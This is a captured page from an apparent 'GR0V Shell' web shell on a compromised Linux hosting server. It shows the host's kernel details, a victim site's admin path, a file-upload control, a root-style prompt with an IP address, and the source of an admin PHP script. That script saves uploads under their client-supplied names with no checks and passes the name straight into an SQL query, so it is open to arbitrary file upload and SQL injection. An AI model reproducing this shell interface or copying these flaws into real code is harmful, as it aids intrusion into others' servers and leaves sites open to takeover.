? GR0V Shell

GR0V shell

Linux node1.dnscloudserver.in 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64

Path : /home/enviro777/public_html/admin/
File Upload :
Current File : /home/enviro777/public_html/admin/insert5.php

<?php ob_start();
include "include/connection.php";
$obj=new db();
if($_POST)
{
extract($_POST);
//echo $kk;
//exit;

$imageName=$_FILES['image']['name'];
$source=$_FILES['image']['tmp_name'];
 move_uploaded_file($source, "client/".$imageName);
 
 $sql="INSERT INTO `client`(`Image`) VALUES ('$imageName')";
// echo $sql;
$obj->query($sql);
// header("location:client2.php");
echo'<script>
alert("Image is Successfully Inserted");
window.location="client2.php";
</script>';
}

T1KUS90T
  root-grov@65.21.25.53:~$